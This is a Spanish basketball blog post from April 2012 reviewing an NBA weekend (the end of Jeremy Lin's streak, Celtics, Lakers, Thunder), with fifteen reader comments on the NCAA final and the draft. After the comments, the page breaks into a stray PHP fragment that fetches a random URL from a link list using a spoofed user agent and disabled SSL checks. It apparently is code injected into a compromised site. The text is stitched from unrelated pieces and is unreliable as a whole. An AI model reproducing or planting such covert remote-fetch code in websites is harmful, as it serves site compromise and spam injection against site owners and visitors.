Informe del fin de semana: Se acabó el efecto Lin.

02 de April de 2012 por TheDeerHunter

Perdón por el retraso. Hacemos un breve repaso a lo que ha acontecido el fin de semana. Se nota que vamos administrando fuerzas de cara a la hora de la verdad.

Lo más noticioso es el abrupto final de la historia de Jeremy Lin este curso, que a pesar de todo quedará grabado en nuestras memorias como uno de los casos más insólitos que hayamos vivido. Los Knicks ponen un circo y les crecen los enanos. De momento resisten a duras penas esa octava plaza  e irónicamente están viendo el mejor baloncesto de Carmelo este curso. El viernes fue el mayor esfuerzo en vano y el mejor de la jornada en la derrota ante Hawks. El sábado doblegaban a unos Cavs sin Irving, logrando así empatar con los Bucks el fin de semana. Ellos también destrozaron a los Cavs, pero perdieron ante Memphis. Seguiremos muy atentos este particular duelo.

En la cabeza del Este pocos cambios. Los Bulls, como es lógico, siguen sufriendo sin Rose, pero ni Heat, ni Orlando han aprovechado para acortar, estos últimos también con baja de Howard por medio. Sí lo ha hecho Boston para, con dos sólidas victorias, recuperar la cabeza de la Atlántico. Mención a parte las actuaciones de Garnett, como queriendo reivindicarse en el debate del otro día (nos leen, casi seguro) y el triple doble de Rondo magistral anoche.

“Cuando se pone en modo TV y tiene delante a un equipo de los serios es un escándalo de jugador.” Rumbero

Los Sixers son los grandes damnificados del fin de semana. Se llevaban una importante paliza en Washington y se caen hasta la 7ª plaza. Hawks y Pacers, manteniéndose con luces y sombras, como la mayoría de sus contendientes en la conferencia.

En el Oeste dictatoriales Thunder y Spurs, también con actuaciones escandalosas de Duncan. Lakers protagonistas, con un partido estrañísimo el viernes ante sábado ante unos mermados Hornets en el que Kobe parecía el Dr. Jekyll y Mr. Hyde y anoche una meritoria victoria ante Warriors, con la Mamba en versión divinidad. Pau muy grande todo el fin de semana, en especial anoche multiplicándose por el esguince de Bynum. Resistiendo el nuevo arreón de los Clippers que han andado sobrados todo el fin de semana.

El resto de contendientes en la conferencia, a excepción de Denver que vuelve a dar un paso adelante, han andado al 50% que no garantiza nada en el Oeste. Los Wolves se descuelgan casi definitivamente y Love terminará recuperando premios de mayor esfuerzo en vano, categoría donde  arrasaba el curso pasado.

Comenta

15 comentarios a esta entrada

  1. melo15 dice:
    #1

    Habeis recibido mi articulo de la NCAA?

      Citar

  2. melo15 dice:
    #2

    Por cierto, hoy final del March Madness, Kentucky vs Kansas, o lo que es lo mismo Anthony Davis vs Thomas Robinson, la lucha por el num.1 del Draft, aunque tampoco hay que olvidarse de Michael Kidd-Gilchrist, que estos ultimos partidos ha ejercido de lider, o de Terrence Ross. Os recomiendo que la veais. El anterior partido, Kansas vs Ohio State, estuvo muy emocionante, aunque Sullinger decepciono un poco, en los momentos finales estuvo sobrevio al igual que Bufford. Al final victoria de Kansas, pero Ohio domino el partido, y solo una cagada de Craft, base de los Buckeyes les privo de la victoria.

      Citar

  3. Jose Luis dice:
    #3

    a que hora es melo? puedes pasarte luego a poner un link, o una pagina donde encontrar ese link?

      Citar

  4. Cocinitas dice:
    #4

    Creo que es a las 3 y 20 hora española y se podrá ver por canal plus deportes

      Citar

  5. Jose Luis dice:
    #5

    y por internet donde? 😀

      Citar

  6. Sancho88 dice:
    #6

    Jamás pensé que me gustaría ver a un equipo dirigido por Scott Skyles… Milwaukee, no sé si entrarán o no en playoffs, lo tienen chungo, pero macho, me encanta verles.

      Citar

  7. Sancho88 dice:
    #7

    Si Duncan es ‘Big Fundamental’, Jan Vesely es ‘Little Fundamental’. A este tío de dónde lo han sacado? Se está ganando un puesto de honor en nuestra lista de blancos que no la sabían meter. Supongo que dentro de 10 años le recordaremos junto a nuestros clásicos. Menuda mierda de pavo

      Citar

  8. Esteban dice:
    #8

    q partido de los wildcats, ese davis es una verdadera bestia, como lo es kidd y robinson

    q draft por dios, pensar que buenos jugadores como jared sullinger caiga hasta el puesto 9, marshal al 13, perry jones al 14, austin rivers al 10, hace q portland haya hecho un negocion con los nets

    y otra cosa, hacen que el trade de los hornets por poul no sea tan malo, si bien el pick de minesota no bajaria del 10 lugar, si pueden hacerse con rivers, jones, marshall o sullinger seria igualmente un gran negocio (ademas de el pick alto prpio q tendran)

      Citar

  9. nba dice:
    #9

    Jurr, buen partido de los Ositos, esperemos que se crucen en Playoffs otra vez con los Thunders, ya que creo que en el Oeste son los unicos que pueden detener el caudal de OKC, ya que los Grizzlies parecen un equipo muy solidario y que obtiene buenos resultados a pesar de sus contratiempos.

      Citar

  10. Denise dice:
    #10

    Sancho88: Si Duncan es ‘Big Fundamental’, Jan Vesely es ‘Little Fundamental’. A este tío de dónde lo han sacado? Se está ganando un puesto de honor en nuestra lista de blancos que no la sabían meter. Supongo que dentro de 10 años le recordaremos junto a nuestros clásicos. Menuda mierda de pavo

    Vesely es muy bueno y tiene mucho futuro. Es jovencisimo aún. El problema es que lo compares con los mas grandes como Duncan. El 90% de los jugadores son malos si lo comparas con Tim.
    Vesely será mejor que Kirilenko.

      Citar

  11. TheDeerHunter dice:
    #11

    melo15:
    Habeis recibido mi articulo de la NCAA?

    Melo… mucho me temo que Txusma está fuera de cobertura. Busca mi dirección en la hoops y me lo mandas ahí, pero yo diría que no contábamos con lo tuyo. El resumen de la final four está hecho ya por otro compañero. Veré lo que puedo hacer con tu trabajo.

      Citar

  12. melo15 dice:
    #12

    Es un mock draft

      Citar

  13. melo15 dice:
    #13

    Denise, no se si Vasely tiene futuro o no? Pero no lo esta demostrando, ademas en la mayoria de mock draft, pone que los Wizards van a seleccionar a Kidd-Gilchrist, asi que si no espabila…

      Citar

  14. MagicJohnson32 dice:
    #14

    melo15:
    Es un mock draft

    Perfecto. Envíaselo a Deer y nos encargamos. Gracias, crack.

      Citar

  15. melo15 dice:
    #15

    Enviado

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>